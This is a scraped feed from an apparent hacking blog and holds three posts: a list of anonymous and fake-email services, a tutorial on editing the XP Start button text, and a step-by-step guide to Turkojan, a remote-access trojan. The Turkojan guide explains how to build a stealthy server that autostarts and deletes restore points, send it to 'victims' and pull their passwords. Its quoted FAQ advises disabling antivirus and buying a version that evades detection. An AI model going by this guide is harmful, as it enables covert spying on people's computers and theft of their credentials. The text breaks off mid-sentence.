/&gt;http://www.sharpmail.co.uk/&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;http://www.theanonymousemail.com/&lt;br /&gt;http://www.anonymousspeech.com/&lt;br /&gt;http://www.advicebox.com/&lt;br /&gt;http://www.1netcentral.com/anonymous-email.html&lt;br /&gt;http://anonymous.to/&lt;br /&gt;http://www.mytrashmail.com/&lt;br /&gt;http://deadfake.com/&lt;br /&gt;http://deadfake.com/Send.aspx&lt;br /&gt;http://www.pcgraffiti.com/&lt;br /&gt;http://www.mutemail.com/&lt;br /&gt;http://www.gilc.org/speech/anonymous/remailer.html&lt;br /&gt;http://www.neomailbox.com/&lt;br /&gt;http://www.sendanonymousemail.com/&lt;br /&gt;http://www.freedownloadscenter.com/Best/anonymous-email.html&lt;br /&gt;http://www.emailman.com/anonymous/&lt;br /&gt;http://www.emailprivacy.info/remailers&lt;br /&gt;http://www.swarmail.com/&lt;br /&gt;http://www.fakemailz.com/&lt;br /&gt;http://www.findnot.com/&lt;br /&gt;http://cyberatlantis.com/anonymous_email.php&lt;br /&gt;http://lifehacker.com/software/email/send-anonymous-email-or-sms-186198.php&lt;br /&gt;http://anonymous-email-protection.qarchive.org/&lt;br /&gt;http://www.cryptoheaven.com/anonymous-email/anonymous-email.htm&lt;br /&gt;http://www.thinksecret.com/contact/anonymous.html&lt;br /&gt;http://web.mit.edu/ideas/www/contact_anony.htm&lt;br /&gt;http://www.infoanarchy.org/en/Anonymous_E-Mail&lt;br /&gt;http://shareme.com/showtop/sending-anonymous-email.html&lt;br /&gt;http://www.vicman.net/lib/email/anonymous&lt;br /&gt;http://www.downloadthat.com/windows/catalog/Anonymous_Bulk_Email&lt;br /&gt;http://www.rollyo.com/ereheman/anonymous_email/&lt;br /&gt;http://technorati.com/tag/anonymous+email&lt;br /&gt;http://anonymous-e-mail.qarchive.org/&lt;br /&gt;http://searchexchange.techtarget.com/originalContent/0,289142,sid43_gci1175062,00.html&lt;br /&gt;http://www.senditfake.com/&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Enjoy HaCkInG.....&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-3234467050154244523?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/3234467050154244523/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=3234467050154244523' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/3234467050154244523'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/3234467050154244523'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/08/anonymous-mailers.html' title='Anonymous mailers...'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-4139774931332167078</id><published>2008-08-17T21:47:00.000-07:00</published><updated>2008-08-17T21:48:05.024-07:00</updated><title type='text'>Change Text on XP Start Button...</title><content type='html'>Step 1 - Modify Explorer.exe File&lt;br /&gt;&lt;br /&gt;In order to make the changes, the file explorer.exe located at C:\Windows needs to be edited. Since explorer.exe is a binary file it requires a special editor. For purposes of this article we have used Resource Hacker. Resource HackerTM is a freeware utility to view, modify, rename, add, delete and extract resources in 32bit Windows executables and resource files (*.res). It incorporates an internal resource script compiler and decompiler and works on Mcft Windows 95/98/ME, Windows NT, Windows 2000 and Windows XP operating systems.&lt;br /&gt;&lt;br /&gt;get Resource HackerTM from: &lt;a href="http://delphi.icm.edu.pl/ftp/tools/ResHack.zip" target="-blank"&gt;http://delphi.icm.edu.pl/ftp/tools/ResHack.zip&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;The first step is to make a backup copy of the file explorer.exe located at C:\Windows\explorer. Place it in a folder somewhere on your hard drive where it will be safe. Start Resource Hacker and open explorer.exe located at C:\Windows\explorer.exe.&lt;br /&gt;&lt;br /&gt;The category we are going to be using is "String Table". Expand it by clicking the plus sign then navigate down to and expand string 37 followed by highlighting 1033. If you are using the Classic Layout rather than the XP Layout, use number 38. The right hand pane will display the stringtable. We’re going to modify item 578, currently showing the word “start” just as it displays on the current Start button.&lt;br /&gt;&lt;br /&gt;There is no magic here. Just double click on the word “start” so that it’s highlighted, making sure the quotation marks are not part of the highlight. They need to remain in place, surrounding the new text that you’ll type. Go ahead and type your new entry. In my case we used Click Me!&lt;br /&gt;&lt;br /&gt;You’ll notice that after the new text string has been entered the Compile Script button that was grayed out is now active. we won’t get into what’s involved in compiling a script, but suffice it to say it’s going to make this exercise worthwhile. Click Compile Script and then save the altered file using the Save As command on the File Menu. Do not use the Save command – Make sure to use the Save As command and choose a name for the file. Save the newly named file to C:\Windows.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Step 2 – Modify the Registry&lt;br /&gt;&lt;br /&gt;!!!make a backup of your registry before making changes!!!&lt;br /&gt;&lt;br /&gt;Now that the modified explorer.exe has been created it’s necessary to modify the registry so the file will be recognized when the user logs on to the system. If you don’t know how to access the registry I’m not sure this article is for you, but just in case it’s a temporary memory lapse, go to Start (soon to be something else) Run and type regedit in the Open field. Navigate to:&lt;br /&gt;&lt;br /&gt;HKEY_LOCAL_MACHINE\ SOFTWARE\ Mcft\ Windows NT\ CurrentVersion\ Winlogon&lt;br /&gt;&lt;br /&gt;In the right pane, double click the "Shell" entry to open the Edit String dialog box. In Value data: line, enter the name that was used to save the modified explorer.exe file. Click OK.&lt;br /&gt;&lt;br /&gt;Close Registry Editor and either log off the system and log back in, or reboot the entire system if that’s your preference. If all went as planned you should see your new Start button with the revised text.[/b]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Enjoy HaCkInG....&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-4139774931332167078?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/4139774931332167078/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=4139774931332167078' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/4139774931332167078'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/4139774931332167078'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/08/change-text-on-xp-start-button.html' title='Change Text on XP Start Button...'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-5481883392053749491</id><published>2008-08-17T21:45:00.001-07:00</published><updated>2008-08-17T21:45:54.168-07:00</updated><title type='text'>How to use Turkojan....</title><content type='html'>&lt;span style="color: Blue;"&gt;DISCLAMER: The following information given to u is just for education purposes. Anything that you download is not my fault and damage of such to your PC is not my fault.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://forums.security-forum.net/internet-and-computer-security/141209-turkojan-gold-edition.html" rel="nofollow"&gt;DOWNLOAD&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Hello my fellow Hackers....this tute is aimed to inform u about use of Turkojan.....&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;" class="articleheading"&gt;TURKOJAN V4.0&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Okay first of all what is Turkojan v4.0?&lt;br /&gt;&lt;br /&gt;It is basically a RAT(remote &lt;a id="KonaLink0" target="_top" class="kLink" style="text-decoration: underline ! important; position: static;" href="http://www.go4expert.com/forums/showthread.php?t=12531#"&gt;&lt;span style="color: rgb(0, 128, 0) ! important; font-family: tahoma,verdana,geneva,lucida,&amp;quot;;font-size:13;color:#008000;&amp;quot;;"&gt;&lt;span class="kLink" style="color: rgb(0, 128, 0) ! important; font-family: tahoma,verdana,geneva,lucida,&amp;quot;;font-size:13;&amp;quot;;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;admin tool) with  more features / type of a trojan. Below are the features for v4.0&lt;br /&gt;&lt;br /&gt;&lt;div style="margin: 5px 20px 20px;"&gt;  &lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Quote:&lt;/div&gt;  &lt;table border="0" cellpadding="6" cellspacing="0" width="100%"&gt;  &lt;tbody&gt;&lt;tr&gt;   &lt;td class="alt2" style="border: 1px inset ;"&gt;&lt;ul&gt;&lt;li&gt; Reverse Connection&lt;/li&gt;&lt;li&gt; Remote Desktop(very fast)&lt;/li&gt;&lt;li&gt; Webcam Streaming(very fast)&lt;/li&gt;&lt;li&gt; Audio Streaming&lt;/li&gt;&lt;li&gt; &lt;a id="KonaLink1" target="_top" class="kLink" style="text-decoration: underline ! important; position: static;" href="http://www.go4expert.com/forums/showthread.php?t=12531#"&gt;&lt;span style="color: rgb(0, 128, 0) ! important; font-family: tahoma,verdana,geneva,lucida,&amp;quot;;font-size:13;color:#008000;&amp;quot;;"&gt;&lt;span class="kLink" style="color: rgb(0, 128, 0) ! important; font-family: tahoma,verdana,geneva,lucida,&amp;quot;;font-size:13;&amp;quot;;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;Thumbnail viewer&lt;/li&gt;&lt;li&gt; Remote passwords&lt;/li&gt;&lt;li&gt; MSN Sniffer&lt;/li&gt;&lt;li&gt; Remote Shell&lt;/li&gt;&lt;li&gt; Web-Site Blocking&lt;/li&gt;&lt;li&gt; Chat with server&lt;a id="KonaLink2" target="_top" class="kLink" style="text-decoration: underline ! important; position: static;" href="http://www.go4expert.com/forums/showthread.php?t=12531#"&gt;&lt;span style="color: rgb(0, 128, 0) ! important; font-family: tahoma,verdana,geneva,lucida,&amp;quot;;font-size:13;color:#008000;&amp;quot;;"&gt;&lt;span class="kLink" style="color: rgb(0, 128, 0) ! important; font-family: tahoma,verdana,geneva,lucida,&amp;quot;;font-size:13;&amp;quot;;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li&gt; Send fake messages&lt;/li&gt;&lt;li&gt; Advanced file manager&lt;/li&gt;&lt;li&gt; Zipping files&amp;amp;folders&lt;/li&gt;&lt;li&gt;Find files&lt;br /&gt;&lt;/li&gt;&lt;li&gt; Change remote screen resolution&lt;/li&gt;&lt;li&gt; Mouse manager&lt;/li&gt;&lt;li&gt; Information about remote computer&lt;a id="KonaLink4" target="_top" class="kLink" style="text-decoration: underline ! important; position: static;" href="http://www.go4expert.com/forums/showthread.php?t=12531#"&gt;&lt;span style="color: rgb(0, 128, 0) ! important; font-family: tahoma,verdana,geneva,lucida,&amp;quot;;font-size:13;color:#008000;&amp;quot;;"&gt;&lt;span class="kLink" style="color: rgb(0, 128, 0) ! important; font-family: tahoma,verdana,geneva,lucida,&amp;quot;;font-size:13;&amp;quot;;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li&gt; Clipboard manager&lt;/li&gt;&lt;li&gt; IE options&lt;/li&gt;&lt;li&gt; Running Process&lt;/li&gt;&lt;li&gt; Service Manager&lt;/li&gt;&lt;li&gt; Keyboard Manager&lt;/li&gt;&lt;li&gt; Online keylogger&lt;a id="KonaLink5" target="_top" class="kLink" style="text-decoration: underline ! important; position: static;" href="http://www.go4expert.com/forums/showthread.php?t=12531#"&gt;&lt;span style="color: rgb(0, 128, 0) ! important; font-family: tahoma,verdana,geneva,lucida,&amp;quot;;font-size:13;color:#008000;&amp;quot;;"&gt;&lt;span class="kLink" style="color: rgb(0, 128, 0) ! important; font-family: tahoma,verdana,geneva,lucida,&amp;quot;;font-size:13;&amp;quot;;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li&gt; Offline keylogger&lt;/li&gt;&lt;li&gt; Fun Menu&lt;/li&gt;&lt;li&gt; Registry manager&lt;/li&gt;&lt;li&gt; Invisible in searching&lt;a id="KonaLink6" target="_top" class="kLink" style="text-decoration: underline ! important; position: static;" href="http://www.go4expert.com/forums/showthread.php?t=12531#"&gt;&lt;span style="color: rgb(0, 128, 0) ! important; font-family: tahoma,verdana,geneva,lucida,&amp;quot;;font-size:13;color:#008000;&amp;quot;;"&gt;&lt;span class="kLink" style="color: rgb(0, 128, 0) ! important; font-family: tahoma,verdana,geneva,lucida,&amp;quot;;font-size:13;&amp;quot;;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/a&gt; Files/Regedit/Msconfig&lt;/li&gt;&lt;li&gt; Small Server (100kb)&lt;/li&gt;&lt;/ul&gt;Reverse Connection :&lt;br /&gt;Turkojan uses reverse connection method to reach remote computers.&lt;br /&gt;    &lt;/td&gt;  &lt;/tr&gt;  &lt;/tbody&gt;&lt;/table&gt; &lt;/div&gt;Now doesn't that sound great? i think it does&lt;br /&gt;&lt;br /&gt;Lets move on to downloading this program&lt;br /&gt;&lt;br /&gt;First of all you need to see if you have a static ip or a dynamic ip now what is  a static ip and a dynamic ip?&lt;br /&gt;&lt;br /&gt;Dynamic IP&lt;br /&gt;&lt;br /&gt;&lt;div style="margin: 5px 20px 20px;"&gt;  &lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Quote:&lt;/div&gt;  &lt;table border="0" cellpadding="6" cellspacing="0" width="100%"&gt;  &lt;tbody&gt;&lt;tr&gt;   &lt;td class="alt2" style="border: 1px inset ;"&gt; Dynamic IP: A dynamic IP address changes each time you connect to your Internet Service Provider (ISP). This allows ISPs to keep a pool of addresses available to subscribers. If you disconnect from the ISP, your address is returned to the pool, becoming available to the next computer that connects. &lt;/td&gt;  &lt;/tr&gt;  &lt;/tbody&gt;&lt;/table&gt; &lt;/div&gt;Static ip&lt;br /&gt;&lt;br /&gt;&lt;div style="margin: 5px 20px 20px;"&gt;  &lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Quote:&lt;/div&gt;  &lt;table border="0" cellpadding="6" cellspacing="0" width="100%"&gt;  &lt;tbody&gt;&lt;tr&gt;   &lt;td class="alt2" style="border: 1px inset ;"&gt; Static IP: A static IP address is fixed, much like a telephone number. If your ISP gives you a static address, you will always use the same address. Servers usually have static addresses, so they can always be found at the same location. &lt;/td&gt;  &lt;/tr&gt;  &lt;/tbody&gt;&lt;/table&gt; &lt;/div&gt;Now if you have a dynamic ip go to&lt;br /&gt;&lt;br /&gt;&lt;a href="https://www.dyndns.com/" rel="nofollow"&gt;DYNDNS&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;watch this video&lt;a id="KonaLink7" target="_top" class="kLink" style="text-decoration: underline ! important; position: static;" href="http://www.go4expert.com/forums/showthread.php?t=12531#"&gt;&lt;span style="color: rgb(0, 128, 0) ! important; font-family: tahoma,verdana,geneva,lucida,&amp;quot;;font-size:13;color:#008000;&amp;quot;;"&gt;&lt;span class="kLink" style="color: rgb(0, 128, 0) ! important; font-family: tahoma,verdana,geneva,lucida,&amp;quot;;font-size:13;&amp;quot;;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/a&gt; on how to set up your dyndns&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.turkojan.com/video/dyneng.htm" rel="nofollow"&gt;Video&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;watch this video on how to set up your NO-IP&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.turkojan.com/video/noipenglish.htm" rel="nofollow"&gt;Video&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Now after you have done that open up turkojan v4.0 and at the top left hand corner select what language u want to view the program in then after that go to editor type in the ip that u used to sign up with no-ip / dyndns leave connection port the way it is conncetion delay leave it or change it up to u type in the username for the server your creating then click stealth mode and enable any of the following&lt;br /&gt;&lt;br /&gt;&lt;div style="margin: 5px 20px 20px;"&gt;  &lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Code: &lt;/div&gt;  &lt;pre class="alt2" style="border: 1px inset ; margin: 0px; padding: 6px; overflow: auto; width: 60%; height: 114px;"&gt;&lt;div dir="ltr" style="text-align: left;"&gt;copy server to pc&lt;br /&gt;autostart server&lt;br /&gt;melt server when run&lt;br /&gt;copy with old file date&lt;br /&gt;delete system restore points&lt;br /&gt;restart when server is&lt;/div&gt;&lt;/pre&gt; &lt;/div&gt;Show message this message will display when the victam downloads your server then click the icon or you can use default or you can use icon hunter to convert a picture to a .ico =icon click save save it as what ever you want&lt;br /&gt;&lt;br /&gt;Zip it up with&lt;a id="KonaLink8" target="_top" class="kLink" style="text-decoration: underline ! important; position: static;" href="http://www.go4expert.com/forums/showthread.php?t=12531#"&gt;&lt;span style="color: rgb(0, 128, 0) ! important; font-family: tahoma,verdana,geneva,lucida,&amp;quot;;font-size:13;color:#008000;&amp;quot;;"&gt;&lt;span class="kLink" style="color: rgb(0, 128, 0) ! important; font-family: tahoma,verdana,geneva,lucida,&amp;quot;;font-size:13;&amp;quot;;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/a&gt; winrar but make it a .zip file then send it to ur victims once they open it up it will say so in so is now online click here to connect with them be sure to click start before sending it to them tho. Or else u wouldn't know they are online and then you can do whatever for getting passwords from the pc go to passwords then click msn then it will download necessary file for you to view the passwords then after thats done it will show you the passwords on the pc.&lt;br /&gt;&lt;br /&gt;&lt;span class="articleheading"&gt;Questions  and answers?&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Q: What is Turkojan?&lt;blockquote&gt;A. Turkojan is a remote administration and spying tool for Microsoft Windows operating  system &lt;a id="KonaLink9" target="_top" class="kLink" style="text-decoration: underline ! important; position: static;" href="http://www.go4expert.com/forums/showthread.php?t=12531#"&gt;&lt;span style="color: rgb(0, 128, 0) ! important; font-family: tahoma,verdana,geneva,lucida,&amp;quot;;font-size:13;color:#008000;&amp;quot;;"&gt;&lt;span class="kLink" style="color: rgb(0, 128, 0) ! important; font-family: tahoma,verdana,geneva,lucida,&amp;quot;;font-size:13;&amp;quot;;"&gt;&lt;/span&gt;&lt;span class="kLink" style="color: rgb(0, 128, 0) ! important; font-family: tahoma,verdana,geneva,lucida,&amp;quot;;font-size:13;&amp;quot;;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;.You can use Turkojan for manage computers,employee monitoring and child monitoring…&lt;/blockquote&gt;&lt;br /&gt;Q: What operating systems are supported?&lt;blockquote&gt;A. Windows 95/95B&lt;br /&gt;Windows 98/98SE&lt;br /&gt;Windows ME&lt;br /&gt;Windows NT 4.0&lt;br /&gt;Windows 2000&lt;br /&gt;Windows XP&lt;a id="KonaLink10" target="_top" class="kLink" style="text-decoration: underline ! important; position: static;" href="http://www.go4expert.com/forums/showthread.php?t=12531#"&gt;&lt;span style="color: rgb(0, 128, 0) ! important; font-family: tahoma,verdana,geneva,lucida,&amp;quot;;font-size:13;color:#008000;&amp;quot;;"&gt;&lt;span class="kLink" style="color: rgb(0, 128, 0) ! important; font-family: tahoma,verdana,geneva,lucida,&amp;quot;;font-size:13;&amp;quot;;"&gt;&lt;/span&gt;&lt;span class="kLink" style="color: rgb(0, 128, 0) ! important; font-family: tahoma,verdana,geneva,lucida,&amp;quot;;font-size:13;&amp;quot;;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;Windows Vista. &lt;/blockquote&gt;&lt;br /&gt;Q: When I try to download Turkojan a problem occurs,what can i do?&lt;blockquote&gt;A. Due to the increased demand for remote spying products, anti-virus and anti-spyware s/w&lt;a id="KonaLink14" target="_top" class="kLink" style="text-decoration: underline ! important; position: static;" href="http://www.go4expert.com/forums/showthread.php?t=12531#"&gt;&lt;span style="color: rgb(0, 128, 0) ! important; font-family: tahoma,verdana,geneva,lucida,&amp;quot;;font-size:13;color:#008000;&amp;quot;;"&gt;&lt;span class="kLink" style="color: rgb(0, 128, 0) ! important; font-family: tahoma,verdana,geneva,lucida,&amp;quot;;font-size:13;&amp;quot;;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/a&gt; label some of them as potentially unwanted programs.So your antivirus software could prevent downloading it.Close your antivirus software and try again..&lt;/blockquote&gt;&lt;br /&gt;Q: I have downloaded Turkojan,what should i do now?&lt;blockquote&gt;A. You need to do some configrations to use Turkojan :&lt;br /&gt;- Firstly, you need to forward port 15963(TCP) on your router&lt;a id="KonaLink12" target="_top" class="kLink" style="text-decoration: underline ! important; position: static;" href="http://www.go4expert.com/forums/showthread.php?t=12531#"&gt;&lt;span style="color: rgb(0, 128, 0) ! important; font-family: tahoma,verdana,geneva,lucida,&amp;quot;;font-size:13;color:#008000;&amp;quot;;"&gt;&lt;span class="kLink" style="color: rgb(0, 128, 0) ! important; font-family: tahoma,verdana,geneva,lucida,&amp;quot;;font-size:13;&amp;quot;;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;- If you don’t have static ip address,your IP address will change every time you connect to the internet.So your server won’t be able to reach you.&lt;br /&gt;To prevent loosing servers because of Dynamic IP Address System,you need to create an account from No-ip or DynDNS services.&lt;/blockquote&gt;&lt;br /&gt;Q: My antivirus software says that Turkojan includes a virus,is it true?&lt;blockquote&gt;A. Due to the increased demand for remote spying products, anti-virus and anti-spyware software label some of them as potentially unwanted programs.So your antivirus software can be the problem that prevents installing and downloading Turkojan,you can close your antivirus software and try to install Turkojan again.We suggest you to buy Turkojan Private Edition.&lt;/blockquote&gt;&lt;br /&gt;Q: Will Turkojan slow down my computer?&lt;blockquote&gt;A. No. Turkojan is a really small and efficient application.&lt;a id="KonaLink13" target="_top" class="kLink" style="text-decoration: underline ! important; position: static;" href="http://www.go4expert.com/forums/showthread.php?t=12531#"&gt;&lt;span style="color: rgb(0, 128, 0) ! important; font-family: tahoma,verdana,geneva,lucida,&amp;quot;;font-size:13;color:#008000;&amp;quot;;"&gt;&lt;span class="kLink" style="color: rgb(0, 128, 0) ! important; font-family: tahoma,verdana,geneva,lucida,&amp;quot;;font-size:13;&amp;quot;;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/a&gt; It works quietly in the background and has been optimized to minimize resource use. You will not notice any decrease of performance of your computer..&lt;/blockquote&gt;&lt;br /&gt;Q: I have forgetten the password of my router,what should I do?&lt;blockquote&gt;A. You can reset your router and load default settings.&lt;/blockquote&gt;&lt;br /&gt;Q: How can I understand that my ports are successfully forwarded?&lt;blockquote&gt;A. You can use Port Tester in Turkojan Client.Check local tools in left menu..&lt;/blockquote&gt;&lt;br /&gt;Q: Why should I register a No-Ip veya DynDNS account?&lt;blockquote&gt;A. If you don’t have static ip address,your ip address will change every time you connect to the internet.So your server won’t be able to reach you.&lt;br /&gt;To prevent loosing servers because of Dynamic IP Address System,you need to create an account from No-ip or DynDNS services.&lt;br /&gt;You can check videos, showing how to create accounts from these services..&lt;/blockquote&gt;&lt;br /&gt;Q: I have forwarded tcp port 15963 and create an account from No-Ip or DynDNS service,what should I do now ?&lt;blockquote&gt;A. Now you need to create a server and send it to the computer that you want to connect.You can learn creating server from here.&lt;/blockquote&gt;&lt;br /&gt;Q: I have created a server from Server Editor,but I can’t see any server in directory where I save. Why ?&lt;blockquote&gt;A. Due to the increased demand for remote spying products, anti-virus and anti-spyware software label some of them as potentially unwanted programs.&lt;br /&gt;Your antivirus software can label Turkojan Public Edition as unwanted application,so we suggest you to uninstall your antivirus software.&lt;/blockquote&gt;&lt;br /&gt;Q: I have created server,but I can’t send it via MSN or mail, what should i do ?&lt;blockquote&gt;A. Server file is an application so you can’t send this type files via MSN and mail.So you need to add these files into achieve.We suggest you to use Winrar or Winzip..&lt;/blockquote&gt;&lt;br /&gt;Q: I did everything but when I send a server to my friend , I can’t connect him/her.Why ?&lt;blockquote&gt;A. Due to the increased demand for remote spying products, anti-virus and anti-spyware software label some of them as potentially unwanted programs. So antivirus software which is installed on remote computer can cause this,we suggest you to buy Turkojan Private Edition.&lt;/blockquote&gt;&lt;br /&gt;Q: My and my friend’s antivirus softwares are closed,but I still can’t connect,what should I do ?&lt;blockquote&gt;A. Your friend should uninstall antivirus software completely.&lt;/blockquote&gt;&lt;br /&gt;Q: I can see remote computer on Turkojan,but I can’t manage this computer.What should I do?&lt;blockquote&gt;A. Congratulations.. To manage or start monitoring remote computer,you need to select it from the list and double click on it…&lt;/blockquote&gt;&lt;br /&gt;Q: I want to order Turkojan Private Edition.How much should I pay and how can I pay ?&lt;blockquote&gt;A. You can contact us via e-mail,we will reply it as soon as possible..&lt;/blockquote&gt;&lt;br /&gt;Q: What are the differences between Turkojan Public Edition and Turkojan Private Edition ?&lt;blockquote&gt;A. Turkojan Private Edition can’t be labeled as unwanted program by antivirus softwares.That means Turkojan will work without any problems with Antivirus softwares.&lt;/blockquote&gt;&lt;br /&gt;Q: After I purchase Turkojan Private Edition,if I have any problems,what can I do ? ?&lt;blockquote&gt;A. If you have any problems you can contact us 7/24 via MSN and mail. Also you will be able to login private zone,so you can get help from other customers that bought Turkojan…&lt;/blockquote&gt;&lt;br /&gt;Q: How can I login private zone ?&lt;blockquote&gt;A. We will send you a username and password after you purchase Turkojan Private Edition,so you will be able to login with these information..&lt;/blockquote&gt;&lt;br /&gt;Q: Is Turkojan illegal ?&lt;blockquote&gt;A. No, there is nothing illegal about Turkojan itself. The vast majority of its developer is law-abiding person who create his programs exclusively for legitimate purposes.&lt;br /&gt;There are many situations when monitoring the computer activity is perfectly legal: the parents can use key loggers to protect their children from online abuse,the companies may use Internet monitoring s/w&lt;a id="KonaLink15" target="_top" class="kLink" style="text-decoration: underline ! important; position: static;" href="http://www.go4expert.com/forums/showthread.php?t=12531#"&gt;&lt;span style="color: rgb(0, 128, 0) ! important; font-family: tahoma,verdana,geneva,lucida,&amp;quot;;font-size:13;color:#008000;&amp;quot;;"&gt;&lt;span class="kLink" style="color: rgb(0, 128, 0) ! important; font-family: tahoma,verdana,geneva,lucida,&amp;quot;;font-size:13;&amp;quot;;"&gt;&lt;/span&gt;&lt;span class="kLink" style="color: rgb(0, 128, 0) ! important; font-family: tahoma,verdana,geneva,lucida,&amp;quot;;font-size:13;&amp;quot;;"&gt;&lt;/span&gt;&lt;span class="kLink" style="color: rgb(0, 128, 0) ! important; font-family: tahoma,verdana,geneva,lucida,&amp;quot;;font-size:13;&amp;quot;;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/a&gt; to ensure that their employees don’t misuse corporate Internet connection and so on. Of course some people can&lt;br /&gt;use the very same software for stealing passwords, credit card numbers or corporate secrets. However, even in this situation it’s not the software that breaks the law, but the person using it. There are also uses that are not strictly illegal, but have some moral ambiguity to them (for example, a computer activity monitor may be used to catch in the act a cheating spouse). When Turkojan is purchased the purchaser agrees that the computer it will be installed on is his or her own computer..&lt;/blockquote&gt;&lt;br /&gt;Q: Do I break any law by using Turkojan ?&lt;blockquote&gt;A. It depends on the way you use them. In most cases you have the right to install any programs on the computer that belongs to you. You also have the right to install programs on other peoples’ computers if you have their permission. Installing a monitoring 
